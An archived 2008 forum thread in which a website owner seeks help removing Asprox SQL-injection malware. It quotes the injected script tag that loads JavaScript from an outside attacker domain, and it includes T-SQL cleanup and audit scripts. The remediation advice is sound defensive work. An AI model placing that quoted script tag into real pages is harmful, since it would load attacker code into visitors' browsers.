Aug 14th, 2008

Re: How to get out malware from website

Report it to the ISP administrator.

If the ISP won't or can't stop it, change ISP services.
MidiMagic

Aug 24th, 2008

Answer: How to get out malware from website

(<script src=http://www.uhwc.ru/js.js></script>)

Hi,
I have had the same problem and was even tagged by Google.

The only way to do it is to open your entire web site (I mean all of the files) in whatever software you use and do a search and replace. Change all of your passwords (server, database, email, etc.).

Mine has not come back since.

My problem started around mid-August 2008 ... Is Godaddy your hosting company by any chance?
123468743867143

Aug 26th, 2008

Re: How to get out malware from website

You have a form on your website that has been exploited. It's part of a very big botnet that automatically finds vulnerabilities for ASP and injects source into one of your fields. Fix the problem with correct error checking and then edit your database and remove the JavaScript links.

If you want to find out more information about this botnet, it's been given the alias asprox.
omol

Aug 26th, 2008

Re: How to get out malware from website

I am looking into it right now. I thought my problem was over with. This is scary. I have had inconsistent behavior from MySQL and your input might help me pinpoint the issue. Thank you.
123468743867143

Aug 26th, 2008

Re: How to get out malware from website

Good luck. If you get stuck, let me know and I will help further.
omol

Aug 26th, 2008

Re: How to get out malware from website

Hi Omol,

Since you asked ... I have been looking into my db (not very good at it though) ... what exactly am I looking for? In the web pages, it was easy to find the intrusive URL and delete it. What do I search for? I tried asprox, etc. ... nothing found.

Thank you.

Rachel
123468743867143

Aug 26th, 2008

Re: How to get out malware from website

I would start with the string "js.js". What database tech are you using? MsSql?

OK, I have found some good material now.

http://www.networkcloaking.com/ASPROX_Toolkit.pdf
Last edited by omol; Aug 26th, 2008 at 12:55 pm. Reason: Found some info on removal. Too fast for my edit.
omol

Aug 26th, 2008

Re: How to get out malware from website

Yes, MySQL. I looked for js.js in db, not there.

I did remove js.js from the website pages a while back. I checked again, it has not come back.

Something is making my database inconsistent ... Users able to register a new listing one minute but not the other (while the database is still taking their info but not publishing it back to the site).
Last edited by 123468743867143; Aug 26th, 2008 at 12:51 pm.
123468743867143

Aug 26th, 2008

Re: How to get out malware from website

Sorry, I should not edit posts.

Here's the fix. Replace infected_table with the table name that is infected on your site.

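```sql
-- T-SQL for Microsoft SQL Server. Back up the database first: the UPDATE rewrites data in place.
-- <infected_table> is the post's placeholder; USE expects the name of the database that holds the infected tables.
use <infected_table>
DECLARE @T varchar(255), @C varchar(255);
-- Walk every text-like column of every user table.
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR    -- ntext
b.xtype = 35 OR     -- text
b.xtype = 231 OR    -- nvarchar
b.xtype = 167);     -- varchar
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
-- For values that end in </script>, keep only the text before the last "<script".
-- The search runs on the reversed string, so "<script" appears as "tpircs<".
-- Values longer than 8000 characters are cut off by the convert to varchar(8000).
EXEC(
'update ['+@T+'] set ['+@C+'] = left(
convert(varchar(8000), ['+@C+']),
len(convert(varchar(8000), ['+@C+'])) - 6 -
patindex(''%tpircs<%'',
reverse(convert(varchar(8000), ['+@C+'])))
)
where ['+@C+'] like ''%<script%</script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
```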

If you need to know more, or want more information, have a look at:

http://www.networkcloaking.com/ASPROX_Toolkit.pdf
omol
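
A read-only pre-check for the cleanup script in the post above, added here as an example and not part of omol's post or the linked toolkit. It reuses the same sysobjects/syscolumns walk to count, per text column, the rows that contain `<script` and the rows that end in `</script>` (the ones the UPDATE would truncate), which also answers the earlier "what do I search for?" question on SQL Server. The names `Audit_Cursor` and `#Hits` are illustrative; it assumes SQL Server and tables in the default schema, as the thread's script does.

```sql
-- Added example: audit only, changes no user data.
-- Run it in the affected database before any UPDATE-based cleanup.
SET NOCOUNT ON;

DECLARE @T sysname, @C sysname, @Sql nvarchar(4000);

-- Illustrative temp table that collects one row per scanned column.
CREATE TABLE #Hits (
    TableName          sysname,
    ColumnName         sysname,
    RowsWithScript     int NULL,  -- "<script" anywhere in the value
    RowsEndingInScript int NULL   -- value ends in "</script>"
);

DECLARE Audit_Cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT a.name, b.name
    FROM sysobjects a
    JOIN syscolumns b ON a.id = b.id
    WHERE a.xtype = 'u'
      AND b.xtype IN (99, 35, 231, 167);  -- ntext, text, nvarchar, varchar

OPEN Audit_Cursor;
FETCH NEXT FROM Audit_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0)
BEGIN
    -- QUOTENAME brackets the identifiers; the names are passed as parameters.
    -- LIKE follows the column collation (case-insensitive by default).
    SET @Sql = N'INSERT INTO #Hits
        SELECT @t, @c,
          SUM(CASE WHEN ' + QUOTENAME(@C) + N' LIKE ''%<script%'' THEN 1 ELSE 0 END),
          SUM(CASE WHEN ' + QUOTENAME(@C) + N' LIKE ''%<script%</script>'' THEN 1 ELSE 0 END)
        FROM ' + QUOTENAME(@T) + N';';
    EXEC sp_executesql @Sql, N'@t sysname, @c sysname', @t = @T, @c = @C;
    FETCH NEXT FROM Audit_Cursor INTO @T, @C;
END;
CLOSE Audit_Cursor;
DEALLOCATE Audit_Cursor;

-- Columns with hits, worst first. Empty tables yield NULL counts and are filtered out.
SELECT TableName, ColumnName, RowsWithScript, RowsEndingInScript
FROM #Hits
WHERE RowsWithScript > 0
ORDER BY RowsWithScript DESC;

DROP TABLE #Hits;
```

A column where RowsWithScript is larger than RowsEndingInScript holds script tags that are not at the end of the value; the cleanup UPDATE leaves those rows alone, so they need manual review.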
Aug 26th, 2008

Re: How to get out malware from website

Thank you very much. you are great.
123468743867143